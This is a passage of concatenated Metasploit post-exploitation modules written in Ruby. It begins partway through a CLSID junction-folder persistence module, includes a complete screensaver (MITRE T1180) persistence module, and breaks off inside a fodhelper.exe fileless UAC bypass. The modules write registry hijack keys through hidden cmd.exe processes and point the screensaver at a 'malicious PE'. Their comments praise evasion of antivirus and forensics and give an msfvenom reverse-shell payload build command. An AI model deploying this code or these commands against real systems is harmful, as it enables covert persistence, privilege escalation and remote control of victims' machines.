208 | r=''
209 | hacks = []
210 | app_path = datastore['APPL_PATH'] # %windir%\\System32\\calc.exe
211 | fol_path = datastore['FOLDER_PATH'] # C:\\Users\%username%\Desktop\POC
212 | hive_key = "HKCU\\Software\\Classes\\CLSID" # uac hive key (CLSID)
213 | #
214 | # check for proper config settings enter
215 | # to prevent 'unset all' from deleting default options ..
216 | #
217 | if datastore['APPL_PATH'] == 'nil' || datastore['FOLDER_PATH'] == 'nil'
218 | print_error("Options not configurated correctly ..")
219 | print_warning("Please set APPL_PATH | FOLDER_PATH!")
220 | return nil
221 | else
222 | print_status("junction shell folders (vault7 - nsa)")
223 | Rex::sleep(1.5)
224 | end
225 |
226 | #
227 | # Search in target regedit if hijack hive exists ..
228 | #
229 | print_status("Reading target registry hive keys ..")
230 | Rex::sleep(1.0)
231 | if registry_enumkeys("HKCU\\Software\\Classes\\CLSID")
232 | print_status("Remote registry hive key found!")
233 | Rex::sleep(1.0)
234 | else
235 | # registry hive key not found, aborting module execution ..
236 | print_warning("Hive key: HKCU\\Software\\Classes\\CLSID")
237 | print_error("[ABORT]: module cant find the registry hive key needed ..")
238 | print_error("System does not appear to be vulnerable to the exploit code!")
239 | Rex::sleep(1.0)
240 | return nil
241 | end
242 |
243 | #
244 | # check if file/appl exists remote (APPL_PATH)
245 | #
246 | print_status("check if APPL exists in target ..")
247 | if session.fs.file.exist?(app_path)
248 | print_status("Application (payload) found ..")
249 | else
250 | print_error("Not found: #{app_path}")
251 | print_warning("Deploy your [payload] before using this module ..")
252 | print_warning("OR point to one existing application full path ..")
253 | Rex::sleep(1.0)
254 | return nil
255 | end
256 |
257 |
258 | #
259 | # GATHER INFO ABOUT TARGET SYSTEM .
260 | # store %AppData% directory full path ..
261 | print_status("Retriving %AppData% full path ..")
262 | Rex::sleep(1.0)
263 | data = client.fs.file.expand_path("%AppData%")
264 | # store username into a variable
265 | print_status("Retriving target %username% ..")
266 | Rex::sleep(1.0)
267 | user_name = client.fs.file.expand_path("%username%")
268 | # create new GUID and store it in a variable
269 | print_status("Creating new GUID value ..")
270 | Rex::sleep(1.0)
271 | rep_GUID = cmd_exec("powershell.exe -ep -C \"[guid]::NewGuid().Guid\"")
272 | print_good("New GUID: #{rep_GUID}")
273 | # add parentesis to GUID value
274 | new_GUID = "{#{rep_GUID}}"
275 | Rex::sleep(1.0)
276 |
277 |
278 | #
279 | # List of registry keys to add to target regedit .. (rundll32.exe payload.dll,main)
280 | #
281 | if datastore['PERSIST_EXPLORER'] == true || datastore['RENAME_PERSIST'] == true
282 | print_warning("Persistance mode sellected")
283 | dll_exe = "rundll32 #{app_path},main"
284 | Rex::sleep(1.0)
285 | hacks = [
286 | "#{hive_key}\\#{new_GUID}\\InprocServer32 /ve /t REG_SZ /d #{dll_exe} /f",
287 | "#{hive_key}\\#{new_GUID}\\InprocServer32 /v LoadWithoutCOM /t REG_SZ /d /f",
288 | "#{hive_key}\\#{new_GUID}\\InprocServer32 /v ThreadingModel /t REG_SZ /d Apartment /f",
289 | "#{hive_key}\\#{new_GUID}\\ShellFolder /v Attributes /t REG_DWORD /d 0xf090013d /f",
290 | "#{hive_key}\\#{new_GUID}\\ShellFolder /v HideOnDesktop /t REG_SZ /d /f"
291 | ]
292 | else
293 | #
294 | # DEMO mode (user inputs)
295 | #
296 | print_good("Demonstration mode sellected")
297 | Rex::sleep(1.0)
298 | hacks = [
299 | "#{hive_key}\\#{new_GUID}\\Shell\\Manage\\Command /ve /t REG_SZ /d #{app_path} /f"
300 | ]
301 | end
302 |
303 |
304 | #
305 | # LOOP funtion to add reg keys
306 | #
307 | session.response_timeout=120
308 | hacks.each do |cmd|
309 | begin
310 | # execute cmd prompt in a hidden channelized windows
311 | r = session.sys.process.execute("cmd.exe /c REG ADD #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
312 | print_line(" Hijack: #{cmd}")
313 |
314 | # close client channel when done
315 | while(d = r.channel.read)
316 | break if d == ""
317 | end
318 | r.channel.close
319 | r.close
320 | # error exception funtion
321 | rescue ::Exception => e
322 | print_error("Error Running Command: #{e.class} #{e}")
323 | end
324 | end
325 |
326 |
327 | #
328 | # build POC folder (junction shell folders)
329 | #
330 | if datastore['PERSIST_EXPLORER'] == true
331 | folder_poc ="#{data}\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\POC"
332 | print_status("Creating junction shell folder ..")
333 | Rex::sleep(1.0)
334 | cmd_exec("cmd.exe /R mkdir \"#{folder_poc}.#{new_GUID}\"")
335 | elsif datastore['RENAME_PERSIST'] == true
336 | ren_per = "#{data}\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories"
337 | print_status("Creating junction shell folder ..")
338 | Rex::sleep(1.0)
339 | cmd_exec("cmd.exe /R rename \"#{ren_per} #{ren_per}.{new_GUID}\"")
340 | else
341 | print_status("Creating junction shell folder ..")
342 | Rex::sleep(1.0)
343 | cmd_exec("cmd.exe /R mkdir \"#{fol_path}.#{new_GUID}\"")
344 | end
345 |
346 |
347 | #
348 | # create cleaner resource file [local PC]
349 | #
350 | print_status("Writing cleaner resource file ..")
351 | Rex::sleep(1.0)
352 | rand = Rex::Text.rand_text_alpha(4)
353 | loot_folder = datastore['LOOT_FOLDER']
354 | File.open("#{loot_folder}/Clean_#{rand}.rc", "w") do |f|
355 | f.write("reg deletekey -k HKCU\\\\Software\\\\Classes\\\\CLSID\\\\#{new_GUID}")
356 | f.close
357 | end
358 |
359 |
360 | #
361 | # exploit finished (print info on screen)..
362 | #
363 | Rex::sleep(1.0)
364 | if datastore['PERSIST_EXPLORER'] == true
365 | print_line("---------------------------------------------------")
366 | print_line("Trigger exploit: #{folder_poc}")
367 | print_line("Resource file : #{loot_folder}/Clean_#{rand}.rc")
368 | print_line("---------------------------------------------------")
369 | elsif datastore['RENAME_PERSIST'] == true
370 | print_line("---------------------------------------------------")
371 | print_line("Trigger exploit: #{ren_per}")
372 | print_line("Resource file : #{loot_folder}/Clean_#{rand}.rc")
373 | print_line("Rename folder : cmd.exe /c rename #{ren_per}.{new_GUID} #{ren_per}")
374 | print_line("---------------------------------------------------")
375 | else
376 | print_line("---------------------------------------------------")
377 | print_line("Trigger exploit: #{fol_path}")
378 | print_line("Resource file : #{loot_folder}/Clean_#{rand}.rc")
379 | print_line("---------------------------------------------------")
380 | end
381 |
382 |
383 | #
384 | # end of the 'def run()' funtion (exploit code) ..
385 | #
386 | end
387 |
388 | end
389 |
--------------------------------------------------------------------------------
/windows/hijack/SCRNSAVE_T1180_persistence.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : SCRNSAVE_T1180_persistence.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Affected system: Windows (2008|xp|vista|7|9|10)
13 | # POC: https://attack.mitre.org/techniques/T1180/
14 | #
15 | #
16 | # [ DESCRIPTION ]
17 | # To achieve persistence the attacker can modify SCRNSAVE.EXE value in the registry and change its data to point
18 | # to any malicious file, next the attacker has to enable the screensaver on the endpoint and change screensaver timeout
19 | # by modifying the registry data for 'ScreenSaveActive' and 'ScreenSaveTimeOut'. Once this is completed, anytime the user
20 | # leaves their desktop unattended for the specified amount of time, the screensaver function automatically kicks in and
21 | # executes the attackers malicious PE/Appl.
22 | #
23 | #
24 | # [ MODULE OPTIONS ]
25 | # The session number to run this module on => set SESSION 1
26 | # Set inactivity timeout before screensaver runs (sec) => set TIME_OUT 10
27 | # Set the absoluct path of PE or application to run => set APPL_PATH C:\\Users\\pedro\\Desktop\\binary.exe
28 | # Set the absoluct path where to store logfiles (local) => set LOOT_FOLDER /root
29 | # LogOff current user to force registry refresh? => set LOG_OFF true
30 | #
31 | #
32 | # [ PORT MODULE TO METASPLOIT DATABASE (execute in terminal) ]
33 | # path=$(locate modules/post/windows/escalate | grep -v '\doc' | grep -v '\documentation' | head -n 1)
34 | # sudo cp SCRNSAVE_T1180_persistence.rb $path/SCRNSAVE_T1180_persistence.rb
35 | #
36 | #
37 | # [ RELOAD MSF DATABASE (execute in terminal) ]
38 | # sudo service postgresql start && msfdb reinit
39 | # sudo msfconsole -x 'db_status;reload_all;exit -y'
40 | #
41 | #
42 | # [ BUILD PAYLOAD TO TEST MODULE ]
43 | # sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=666 -f exe -o binary.exe
44 | #
45 | #
46 | # [ LOAD/USE AUXILIARY ]
47 | # meterpreter > background
48 | # msf exploit(handler) > use post/windows/escalate/SCRNSAVE_persistence
49 | # msf post(SCRNSAVE_T1180_persistence) > info
50 | # msf post(SCRNSAVE_T1180_persistence) > show options
51 | # msf post(SCRNSAVE_T1180_persistence) > show advanced options
52 | # msf post(SCRNSAVE_T1180_persistence) > set [option(s)]
53 | # msf post(SCRNSAVE_T1180_persistence) > exploit
54 | ##
55 |
56 |
57 |
58 | #
59 | # Metasploit Module librarys to load ..
60 | #
61 | require 'rex'
62 | require 'msf/core'
63 | require 'msf/core/post/common'
64 | require 'msf/core/post/windows/priv'
65 | require 'msf/core/post/windows/registry'
66 |
67 |
68 | #
69 | # Metasploit Class name and mixins ..
70 | #
71 | class MetasploitModule < Msf::Post
72 | Rank = ExcellentRanking
73 |
74 | include Msf::Post::Common
75 | include Msf::Post::Windows::Priv
76 | include Msf::Post::Windows::Error
77 | include Msf::Post::Windows::Registry
78 |
79 |
80 | #
81 | # The 'def initialize()' funtion ..
82 | # Building Metasploit/Armitage info GUI/CLI description
83 | #
84 | def initialize(info={})
85 | super(update_info(info,
86 | 'Name' => 'SCRNSAVE T1180 (User-land Persistence)',
87 | 'Description' => %q{
88 | To achieve persistence the attacker can modify 'SCRNSAVE.EXE' value in the registry and change its data to point to any malicious file, next the attacker has to enable the screensaver on the endpoint and change screensaver timeout by modifying the registry data for 'ScreenSaveActive' and 'ScreenSaveTimeOut'. Once this is completed, anytime the user leaves their desktop unattended for the specified amount of time, the screensaver function automatically kicks in and executes the attackers malicious PE/Appl.
89 | },
90 | 'License' => UNKNOWN_LICENSE,
91 | 'Author' =>
92 | [
93 | 'Module Author: r00t-3xp10it',
94 | 'Special Thanks: shanty damayanti',
95 | ],
96 |
97 | 'Version' => '$Revision: 1.4',
98 | 'DisclosureDate' => '11 02 2019',
99 | 'Platform' => 'windows',
100 | 'Arch' => 'x86_x64',
101 | 'Privileged' => 'false', # Thats no need for privilege escalation.
102 | 'Targets' =>
103 | [
104 | # Affected systems are.
105 | [ 'Windows 2008', 'Windows xp', 'windows vista', 'windows 7', 'windows 9', 'Windows 10' ]
106 | ],
107 | 'DefaultTarget' => '6', # Default its to run againts windows 10
108 | 'References' =>
109 | [
110 | [ 'URL', 'https://attack.mitre.org/techniques/T1180/' ],
111 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
112 | [ 'URL', 'https://ired.team/offensive-security/t1180-screensaver-hijack' ],
113 | [ 'URL', 'https://www.howtogeek.com/225305/how-to-find-and-set-screen-savers-on-windows-10/' ]
114 |
115 |
116 | ],
117 | 'DefaultOptions' =>
118 | {
119 | 'LOOT_FOLDER' => '/root/.msf4/loot', # Default logs storage directory
120 | 'APPL_PATH' => '%windir%\\System32\\calc.exe', # Default PE/appl (payload) to run (test)
121 | },
122 | 'SessionTypes' => [ 'meterpreter' ]
123 |
124 | ))
125 |
126 | register_options(
127 | [
128 | OptString.new('SESSION', [ true, 'The session number to run this module on', 1]),
129 | OptString.new('TIME_OUT', [ true, 'Set inactivity timeout before screensaver runs', 10]),
130 | OptString.new('APPL_PATH', [ true, 'Set absoluct path of malicious PE/Appl to run'])
131 | ], self.class)
132 |
133 | register_advanced_options(
134 | [
135 | OptBool.new('LOG_OFF', [ false, 'Logoff current user to force registry refresh?', false]),
136 | OptString.new('LOOT_FOLDER', [ true, 'Set the absoluct path where to store revert.rc (local)'])
137 | ], self.class)
138 |
139 | end
140 |
141 |
142 |
143 | def run
144 | session = client
145 | #
146 | # Variable declarations (msf API calls)
147 | #
148 | oscheck = client.fs.file.expand_path("%OS%")
149 | sysnfo = session.sys.config.sysinfo
150 | runtor = client.sys.config.getuid
151 | runsession = client.session_host
152 | directory = client.fs.dir.pwd
153 | # elevate session privileges befor runing
154 | client.sys.config.getprivs.each do |priv|
155 | end
156 | #
157 | # MODULE BANNER
158 | #
159 | print_line(" +--------------------------------------------+")
160 | print_line(" | SCRNSAVE.EXE (User-Land Persistence) |")
161 | print_line(" | Author : r00t-3xp10it (SSA) |")
162 | print_line(" +--------------------------------------------+")
163 | print_line("")
164 | print_line(" Running on session : #{datastore['SESSION']}")
165 | print_line(" Architecture : #{sysnfo['Architecture']}")
166 | print_line(" Computer : #{sysnfo['Computer']}")
167 | print_line(" Target IP addr : #{runsession}")
168 | print_line(" Operative System : #{sysnfo['OS']}")
169 | print_line(" Payload directory : #{directory}")
170 | print_line(" Client UID : #{runtor}")
171 | print_line("")
172 | print_line("")
173 |
174 |
175 | #
176 | # Post-Module variable declarations ..
177 | #
178 | r=''
179 | hacks = []
180 | scrnsave_data=''
181 | scrnsave_timeout=''
182 | time_out = datastore['TIME_OUT'] # 10 sec (if inactive)
183 | app_path = datastore['APPL_PATH'] # %windir%\\System32\\calc.exe
184 | hive_key = "HKCU\\Control Panel\\Desktop" # vulnerable hive key
185 | #
186 | # check for proper config settings enter
187 | # to prevent 'unset all' from deleting default options ..
188 | #
189 | if datastore['APPL_PATH'] == 'nil'
190 | print_error("Options not configurated correctly, execute: info")
191 | print_warning("Please set APPL_PATH ")
192 | return nil
193 | else
194 | print_warning("SCRNSAVE.EXE mitre ATT&CK T1180 (user-land persistence)")
195 | Rex::sleep(1.5)
196 | end
197 | # check for proper operative system (windows-not-wine)
198 | if not oscheck == "Windows_NT"
199 | print_error("[ ABORT ]: This module only works againts windows systems.")
200 | return nil
201 | end
202 | # check for proper operative system version
203 | if not sysinfo['OS'] =~ /Windows (2008|xp|vista|7|9|10)/
204 | print_error("[ ABORT ]: #{sysnfo['OS']} versions are not affected by mitre ATT&CK T1180.")
205 | return nil
206 | end
207 |
208 |
209 | #
210 | # Search in target regedit if hijack hive exists ..
211 | #
212 | print_status("Checking #{sysnfo['Computer']} for mitre ATT&CK T1180 vulnerability.")
213 | Rex::sleep(1.0)
214 | if registry_getvaldata("#{hive_key}","SCRNSAVE.EXE")
215 | print_good("Target system appears to be vulnerable to the exploit code.")
216 | Rex::sleep(0.5)
217 | else
218 | # registry hive key not found, aborting module execution ..
219 | print_error("NOT FOUND: #{hive_key} SCRNSAVE.EXE")
220 | print_warning("Target system does not appear to be vulnerable to the exploit code.")
221 | return nil
222 | end
223 |
224 |
225 | #
226 | # check if PE/appl exists in remote system (APPL_PATH)
227 | #
228 | print_status("checking for #{app_path} in #{sysnfo['Computer']}")
229 | Rex::sleep(1.0)
230 | if session.fs.file.exist?(app_path)
231 | print_good("Remote PE/Application found on target system.")
232 | Rex::sleep(0.5)
233 | else
234 | print_error("Remote PE/Application NOT found on target system.")
235 | Rex::sleep(1)
236 | # If the variable 'app_path' does not contain the char \ in path
237 | # It meens that user have imput the path using only one \ insted of \\ (parsing error)
238 | unless app_path.include? "\\"
239 | print_warning("Warning: Allways use double backslashs defining windows paths.")
240 | return nil
241 | end
242 | print_warning("Deploy your payload in target system before using this module.")
243 | print_warning("OR: Point to one existing application absoluct path (to test).")
244 | return nil
245 | end
246 |
247 |
248 | #
249 | # Store default reg values (target system) to build revert.rc later.
250 | #
251 | print_status("Store default registry values to build revert.rc script.")
252 | Rex::sleep(1.0)
253 | print_status("Retriving default SCRNSAVE.EXE registry value data.")
254 | scrnsave_data = registry_getvaldata('HKCU\Control Panel\Desktop','SCRNSAVE.EXE')
255 | Rex::sleep(0.5)
256 | # make sure the retrieve values are not empty strings
257 | if scrnsave_data.nil? || scrnsave_data == '' || scrnsave_data == ' '
258 | print_warning("Reg value contains empty data, set module default data.")
259 | scrnsave_data = '%windir%\\\\System32\\\\Mystify.src' # windows 10 default data
260 | Rex::sleep(0.5)
261 | else
262 | scrnsave_data = '%windir%\\\\System32\\\\Mystify.src' # windows 10 default data
263 | end
264 | print_status("Retriving default ScreenSaveTimeOut registry value data.")
265 | scrnsave_timeout = registry_getvaldata('HKCU\Control Panel\Desktop','ScreenSaveTimeOut')
266 | Rex::sleep(0.5)
267 | # make sure the retrieve values are not empty strings
268 | if scrnsave_timeout.nil? || scrnsave_timeout == '' || scrnsave_timeout == ' '
269 | print_warning("Reg value contains empty data, set module default data [180]")
270 | scrnsave_timeout = "180" # 180 sec == 3 minuts waiting
271 | Rex::sleep(0.5)
272 | end
273 | print_status("Retriving default ScreenSaverIsSecure registry value data.")
274 | scrnsave_issecure = registry_getvaldata('HKCU\Control Panel\Desktop','ScreenSaverIsSecure')
275 | Rex::sleep(0.5)
276 | # make sure the retrieve values are not empty strings
277 | if scrnsave_issecure.nil? || scrnsave_issecure == '' || scrnsave_issecure == ' '
278 | print_warning("Reg value contains empty data, set module default data [0]")
279 | scrnsave_issecure = "0" # 0 == set screensave secure off
280 | Rex::sleep(0.5)
281 | end
282 | print_status("Retriving default ScreenSaveActive registry value data.")
283 | scrnsave_active = registry_getvaldata('HKCU\Control Panel\Desktop','ScreenSaveActive')
284 | Rex::sleep(0.5)
285 | # make sure the retrieve values are not empty strings
286 | if scrnsave_active.nil? || scrnsave_active == '' || scrnsave_active == ' '
287 | print_warning("Reg value contains empty data, set module default data [1]")
288 | scrnsave_active = "1" # 1 == set screensave active on
289 | Rex::sleep(0.5)
290 | end
291 |
292 |
293 | #
294 | # create revert.rc resource file (in attackers PC)
295 | # (To revert target registry hacked values to default before the hack)
296 | #
297 | rand = Rex::Text.rand_text_alpha(5)
298 | print_good("Writing revert_#{rand}.rc resource file (local).")
299 | Rex::sleep(1.0)
300 | loot_folder = datastore['LOOT_FOLDER'] # /root/.msf4/loot
301 | File.open("#{loot_folder}/revert_#{rand}.rc", "w") do |f|
302 | f.write("###\n")
303 | f.write("## SCRNSAVE mitre ATT&CK T1180 - revert to default script.\n")
304 | f.write("## Computer: #{sysnfo['Computer']} | OS: #{sysnfo['OS']}\n")
305 | f.write("## Payload: #{app_path} | Timeout: #{time_out}\n")
306 | f.write("## To revert hack execute in meterpreter prompt: resource #{loot_folder}/revert_#{rand}.rc\n")
307 | f.write("###\n")
308 | f.write("reg setval -k \"HKCU\\Control Panel\\Desktop\" -v ScreenSaveActive -t REG_SZ -d #{scrnsave_active}\n")
309 | f.write("reg setval -k \"HKCU\\Control Panel\\Desktop\" -v ScreenSaverIsSecure -t REG_SZ -d #{scrnsave_issecure}\n")
310 | f.write("reg setval -k \"HKCU\\Control Panel\\Desktop\" -v ScreenSaveTimeOut -t REG_SZ -d #{scrnsave_timeout}\n")
311 | f.write("reg setval -k \"HKCU\\Control Panel\\Desktop\" -v SCRNSAVE.EXE -t REG_SZ -d #{scrnsave_data}\n")
312 | f.close
313 | end
314 |
315 |
316 | #
317 | # List of registry keys to add to target regedit ..
318 | #
319 | print_status("Hijacking #{sysnfo['Computer']} remote registry keys.")
320 | Rex::sleep(1.0)
321 | hacks = [
322 | "REG ADD \"HKCU\\Control Panel\\Desktop\" /v ScreenSaveActive /t REG_SZ /d 1 /f",
323 | "REG ADD \"HKCU\\Control Panel\\Desktop\" /v ScreenSaveTimeOut /t REG_SZ /d #{time_out} /f",
324 | "REG ADD \"HKCU\\Control Panel\\Desktop\" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f",
325 | "REG ADD \"HKCU\\Control Panel\\Desktop\" /v SCRNSAVE.EXE /t REG_SZ /d #{app_path} /f"
326 | ]
327 | #
328 | # LOOP funtion to add reg keys
329 | #
330 | print_line("")
331 | session.response_timeout=120
332 | hacks.each do |cmd|
333 | begin
334 | # execute cmd prompt in a hidden channelized windows
335 | r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
336 | print_line(" Hijack: #{cmd}")
337 |
338 | # close client channel when done
339 | while(d = r.channel.read)
340 | break if d == ""
341 | end
342 | r.channel.close
343 | r.close
344 | # error exception funtion
345 | rescue ::Exception => e
346 | print_error("Error Running Command: #{e.class} #{e}")
347 | end
348 | end
349 |
350 |
351 | #
352 | # exploit finished (print info onscreen)
353 | #
354 | print_line("")
355 | print_good("Persistence achieved in remote system.")
356 | Rex::sleep(1.0)
357 | print_line("-----------------------------------------------------")
358 | print_line("Malicious PE/App : #{app_path}")
359 | print_line("Trigger exploit : every #{time_out} sec (if inactive)")
360 | print_line("Revert.rc script : resource #{loot_folder}/revert_#{rand}.rc")
361 | print_line("-----------------------------------------------------")
362 | # check if user have set the logoff option
363 | if datastore['LOG_OFF'] == false
364 | print_warning("WARNING: Target system needs to logoff for changes take effect.")
365 | end
366 |
367 |
368 | #
369 | # force target system logoff to refresh registry?
370 | # shutdown using wmic: wmic os where Primary='TRUE' reboot
371 | #
372 | Rex::sleep(1.0)
373 | if datastore['LOG_OFF'] == true
374 | print_warning("Logoff #{sysnfo['Computer']} to force registry refresh.")
375 | Rex::sleep(1)
376 | cmd_exec("shutdown -L")
377 | end
378 |
379 | #
380 | # end of the 'def run()' funtion (exploit code) ..
381 | #
382 | end
383 |
384 | end
385 |
--------------------------------------------------------------------------------
/windows/local-privilege-escalation/enigma_fodhelper_uac_bypass.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : enigma_fodhelper_uac_bypass.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # work againts : Windows 10 (all builds)
13 | # Vuln discover : enigma0x3 | @mattifestation | winscriptingblog (research)
14 | # POC: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
15 | #
16 | #
17 | # [ DESCRIPTION ]
18 | # Most of the UAC bypass techniques require dropping a file to disk (for example, placing a DLL on disk
19 | # to perform a DLL hijack). The technique used in this module differs from the other public methods and
20 | # provides a useful new technique that does not rely on a privileged file copy, code injection, or placing
21 | # a traditional file on disk.
22 | #
23 | # As a normal user, you have write access to keys in HKCU, if an elevated process interacts with keys you
24 | # are able to manipulate, you can potentially interfere with actions a high-integrity process is attempting
25 | # to perform (hijack the process being started). Due to the fact that I was able to hijack the process, it
26 | # is possible to simply execute whatever malicious cmd.exe command you wish. This means that code execution
27 | # has been achieved in a high integrity process (bypassing UAC) without dropping a DLL or other file down to
28 | # the file system. This significantly reduces the risk to the attacker because they aren’t placing a traditional
29 | # file on the file system that can be caught by AV/HIPS or forensically identified later.
30 | # HINT: "This module will not work if target UAC level its set to 'Always Notify'"
31 | #
32 | #
33 | # [ MODULE OPTIONS ]
34 | # The session number to run this module on => set SESSION 3
35 | # The cmd.exe command to be executed (remote) => set EXEC_COMMAND start firefox.exe www.househot.com
36 | # Check target vulnerability settings/status? => set CHECK_VULN true
37 | # Delete malicious registry hive keys/values? => set DEL_REGKEY true
38 | # Use powershell.exe to execute our command? => set USE_POWERSHELL true
39 | #
40 | #
41 | # [ PORT MODULE TO METASPLOIT DATABASE ]
42 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fodhelper_uac_bypass.rb
43 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/enigma_fodhelper_uac_bypass.rb
44 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
45 | #
46 | #
47 | # [ LOAD/USE AUXILIARY ]
48 | # meterpreter > background
49 | # msf exploit(handler) > reload_all
50 | # msf exploit(handler) > use post/windows/escalate/enigma_fodhelper_uac_bypass
51 | # msf post(enigma_fodhelper_uac_bypass) > info
52 | # msf post(enigma_fodhelper_uac_bypass) > show options
53 | # msf post(enigma_fodhelper_uac_bypass) > show advanced options
54 | # msf post(enigma_fodhelper_uac_bypass) > set [option(s)]
55 | # msf post(enigma_fodhelper_uac_bypass) > exploit
56 | #
57 | #
58 | # [ HINT ]
59 | # In some linux distributions postgresql needs to be started and
60 | # metasploit database deleted/rebuild to be abble to load module.
61 | # 1 - service postgresql start
62 | # 2 - msfdb reinit (optional)
63 | # 3 - msfconsole -x 'reload_all'
64 | ##
65 |
66 |
67 |
68 |
69 | #
70 | # Module Dependencies/requires
71 | #
72 | require 'rex'
73 | require 'msf/core'
74 | require 'msf/core/post/common'
75 | require 'msf/core/post/windows/priv'
76 | require 'msf/core/post/windows/registry'
77 |
78 |
79 |
80 |
81 | #
82 | # Metasploit Class name and includes
83 | #
84 | class MetasploitModule < Msf::Post
85 | Rank = ExcellentRanking
86 |
87 | include Msf::Post::Common
88 | include Msf::Post::Windows::Priv
89 | include Msf::Post::Windows::Error
90 | include Msf::Post::Windows::Registry
91 |
92 |
93 |
94 |
95 | #
96 | # Building Metasploit/Armitage info GUI/CLI
97 | #
98 | def initialize(info={})
99 | super(update_info(info,
100 | 'Name' => 'enigma fileless uac bypass [fodhelper.exe]',
101 | 'Description' => %q{
102 | Implementation of fileless uac bypass by enigma and mattifestation (winscriptingblog research) using cmd.exe or powershell.exe This module will create the required registry entry in the current user’s hive, set the reg_sz value to whatever you pass via the EXEC_COMMAND parameter, and runs fodhelper.exe (hijacking the process being started to gain code execution).
103 | },
104 | 'License' => UNKNOWN_LICENSE,
105 | 'Author' =>
106 | [
107 | 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
108 | 'Vuln discover: enigma0x3 | mattifestation | winscripting', # vulnerability credits
109 | ],
110 |
111 | 'Version' => '$Revision: 1.1',
112 | 'DisclosureDate' => 'jun 9 2017',
113 | 'Platform' => 'windows',
114 | 'Arch' => 'x86_x64',
115 | 'Privileged' => 'false', # thats no need for privilege escalation..
116 | 'Targets' =>
117 | [
118 | [ 'Windows 10' ] # Only works againts Windows 10
119 | ],
120 | 'References' =>
121 | [
122 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
123 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
124 | [ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/' ]
125 |
126 |
127 | ],
128 | 'DefaultOptions' =>
129 | {
130 | 'SESSION' => '1', # Default its to run againts session 1
131 | },
132 | 'SessionTypes' => [ 'meterpreter' ]
133 |
134 | ))
135 |
136 | register_options(
137 | [
138 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
139 | OptString.new('EXEC_COMMAND', [ false, 'The command to be executed (eg start notepad.exe)']),
140 | OptBool.new('CHECK_VULN', [ false, 'Check target vulnerability details/status?' , false])
141 | ], self.class)
142 |
143 | register_advanced_options(
144 | [
145 | OptBool.new('DEL_REGKEY', [ false, 'Delete the malicious registry hive/keys?' , false])
146 | ], self.class)
147 |
148 | end
149 |
150 |
151 | #
152 | # GAIN REMOTE CODE EXCUTION BY HIJACKING PROCESS
153 | #
154 | def ls_stage1
155 | session = client
156 |
157 | r=''
158 | vul_serve = "fodhelper.exe" # vulnerable soft to be hijacked
159 | exec_comm = datastore['EXEC_COMMAND'] # my cmd command to execute (OR powershell)
160 | uac_level = "ConsentPromptBehaviorAdmin" # uac level registry key
161 | regi_hive = "REG ADD HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" # registry hive key to be hijacked
162 | hij_value = "REG ADD HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /v DelegateExecute /t REG_SZ /f" # vuln reg value
163 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
164 | #
165 | # check for proper config settings enter
166 | # to prevent 'unset all' from deleting default options ..
167 | #
168 | if datastore['EXEC_COMMAND'] == 'nil'
169 | print_error("Options not configurated correctly ..")
170 | print_warning("Please set EXEC_COMMAND option!")
171 | return nil
172 | else
173 | print_status("Hijacking #{vul_serve} process!")
174 | Rex::sleep(1.5)
175 | end
176 |
177 | #
178 | # Search in target regedit if hive key exists ..
179 | #
180 | print_warning("Reading process registry hive keys ..")
181 | Rex::sleep(1.0)
182 | if registry_enumkeys("HKCU\\Software\\Classes")
183 | print_good(" exec => remote registry hive key found!")
184 | Rex::sleep(1.0)
185 | else
186 | # Registry hive key not found, aborting module execution.
187 | print_warning("Hive key: HKCU\\Software\\Classes")
188 | print_error("[ABORT]: module cant find the registry hive key needed ..")
189 | print_error("System does not appear to be vulnerable to the exploit code!")
190 | print_line("")
191 | Rex::sleep(1.0)
192 | return nil
193 | end
194 |
195 | #
196 | # Check target UAC settings (always notify - will abort module execution)
197 | #
198 | check_success = registry_getvaldata("#{uac_hivek}","#{uac_level}")
199 | # a dword:2 value it means 'always notify' setting is active.
200 | if check_success == 2
201 | print_warning("Target UAC set to: #{check_success} (always notify)")
202 | print_error("[ABORT]: module can not work under this condictions ..")
203 | print_error("Remote system its not vulnerable to the exploit code!")
204 | print_line("")
205 | Rex::sleep(1.0)
206 | return nil
207 | # a dword:nil value it means that we are running againts a 'non-uac-system'
208 | elsif check_success.nil?
209 | print_warning("UAC DWORD DATA EMPTY (NON-UAC-SYSTEM?)")
210 | print_error("[ABORT]: module can not work under this condictions ..")
211 | print_error("Remote system its not vulnerable to the exploit code!")
212 | print_line("")
213 | Rex::sleep(1.0)
214 | return nil
215 | else
216 | # all good in UAC settings :D
217 | print_good(" exec => Target UAC set to: #{check_success} (exploitable)")
218 | Rex::sleep(1.0)
219 | end
220 |
221 | #
222 | # config proper reg keys to be added to target registry
223 | #
